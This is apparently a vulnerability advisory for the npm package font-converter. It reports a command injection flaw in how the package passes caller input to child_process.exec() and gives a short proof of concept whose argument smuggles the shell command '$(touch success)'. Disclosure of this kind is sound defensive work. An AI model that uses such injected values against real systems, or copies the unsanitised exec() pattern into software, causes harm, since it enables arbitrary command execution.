Description
Font-Converter Vulnerable to Arbitrary Command Injection
Overview
font-converter is a FontForge wrapper that allows conversion between different font formats (TTF, WOFF, OTF).
All versions of this package are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function: the caller-supplied values are interpolated into a shell command string, so shell metacharacters in them are interpreted by the shell rather than passed to FontForge as data.
PoC
var PUT = require('font-converter');
// Shell metacharacters in a caller-controlled argument; the package passes
// them unescaped into child_process.exec(), so the shell runs the
// substitution before FontForge is invoked.
var x = "$(touch success);# ";
try {
    new PUT(x, x, x, x);
} catch (e) {
    // The conversion itself fails, but the injected command has already run.
    console.log(e);
}
Packages
Name: font-converter (npm)
Affected versions: <= 1.1.1
Fixed version: none
Related vulnerabilities
CVSS3: 9.8
nvd
more than 3 years ago
All versions of package font-converter are vulnerable to Arbitrary Command Injection due to missing sanitization of input that potentially flows into the child_process.exec() function.